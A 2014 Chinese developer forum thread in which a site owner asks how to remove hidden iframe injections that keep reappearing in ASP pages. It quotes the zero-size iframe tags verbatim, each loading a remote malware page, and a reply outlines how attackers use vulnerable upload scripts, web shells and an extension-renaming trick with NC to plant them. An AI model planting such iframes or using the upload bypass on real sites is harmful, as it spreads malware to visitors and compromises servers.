日期:2014-05-17  浏览次数:21129 次

iframe病毒
<iframe   src=http://www.n85853.cn/index.htm   width=0   height=0> </iframe> <iframe   src=http://www.n85853.cn/index.htm   width=0   height=0> </iframe> <iframe   src=http://www.n85853.cn/index.htm   width=0   height=0> </iframe>
网站文件里不知道为什么老被人放了这么一段代码,conn.asp里有,index.asp也有,清楚了,过一段时间又来了,怎么根除这些病毒   ?

------解决方案--------------------
你的网站中了木马病毒,,
------解决方案--------------------
我也遇到了。

<iframe src=http://58.251.64.54/7/7.htm width=0 height=0> </iframe>
<iframe src=http://www.898977.com/g/index.htm width=0 height=0> </iframe>

在你的网页里面加上此类代码,直接调用的就是病毒。唉。

一般有2种方法可以这样实现:
1.服务器安全性比较差,容易攻入,把服务器上的所有网站,一一修改。
这是服务商的原因。
2.本身咱们的程序有漏洞,一般咱们的网站上都有 上传图片的程序如UPFILE.ASP,UPLOAD.ASP无组件上传,此类程序一般都有漏洞,他们利用此漏洞,先上传小木马,然后再上传大马,有:ASP站长助手或直接上传海洋木马。
  上传了 ASP站长助手后,就可以在线编辑网页源码,可以直接插入代码。
  海洋木马不仅可以改,而且还可以把整个网站源码打包,压缩成.mdb文件,直接下载下来。

有人会说UPFILE.ASP,UPLOAD.ASP是作了限制,比如登录方可使用或是只能上传图片格式的文件。这方面可以突破限制的,我们可以先到此程序路径,然后在浏览器直接打开WSockExpert.exe文件,或使用NC工具,可以绕过去。木马先把扩展名改成图片格式的后缀,上传成功后,再用NC改过来。